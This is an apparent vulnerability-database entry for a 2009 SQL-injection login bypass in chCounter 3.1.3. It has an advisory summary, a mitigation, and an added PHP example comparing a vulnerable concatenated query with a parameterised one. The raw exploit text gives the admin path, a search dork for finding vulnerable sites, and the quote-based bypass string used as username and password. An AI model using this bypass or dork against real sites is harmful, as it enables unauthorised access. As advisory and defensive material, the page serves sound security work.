vendor: chCounter 3.1.3
by: -tmh- & Lainux
CVSS: N/A
N/A
Login Bypass
CWE: 287 (Authentication Issues)
Product Name: chCounter 3.1.3
Affected Version From: 3.1.3
Affected Version To: 3.1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:chcounter:chcounter_3.1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

chCounter 3.1.3 Login Bypass

chCounter 3.1.3 is vulnerable to a login bypass. The flaw is due to insufficient authentication checks when handling user authentication requests. An attacker can exploit it by sending a specially crafted request to the application with a username and password of '=' to bypass authentication and gain access to the application.

Mitigation:

Ensure that authentication requests are properly validated and that all input is properly sanitized.
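
The mitigation above, as an added example (not chCounter's code and not taken from the advisory): it assumes the login check builds its SQL by string concatenation, which the "magic quotes = off" precondition suggests but the page does not show. The `admins` table, both functions and the sample input are constructed for illustration, and an in-memory SQLite database stands in for the application's real one.

```php
<?php
// Added illustration: constructed schema and login checks, not chCounter's source.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (name TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO admins (name, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Weak pattern (assumed): request values are concatenated into the SQL text.
// Nothing escapes quotes here; magic_quotes_gpc was removed in PHP 5.4,
// so on current PHP this code is always in the "magic quotes = off" state.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT COUNT(*) FROM admins WHERE name = '$user' AND pass_hash = '$pass'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened: the name is bound as data, and the password is verified in PHP
// against a stored hash, so no request value can become SQL syntax.
function login_bound(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM admins WHERE name = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();   // false when no such user exists
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed quote-bearing input of the kind the advisory describes.
$quoted = "' OR ''='";

$cases = [
    'concat, quoted input'  => login_concat($db, $quoted, $quoted),
    'bound, quoted input'   => login_bound($db, $quoted, $quoted),
    'bound, wrong password' => login_bound($db, 'admin', 'guess'),
    'bound, valid login'    => login_bound($db, 'admin', 'correct horse'),
];
foreach ($cases as $label => $ok) {
    printf("%-24s %s\n", $label, $ok ? 'ACCEPTED' : 'rejected');
}
```

Run it with the PHP CLI (the `pdo_sqlite` extension is required). Only the concatenating check treats the quoted input as part of the query; the bound check handles it as an ordinary, non-matching user name.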

Exploit-DB raw data:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Künftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]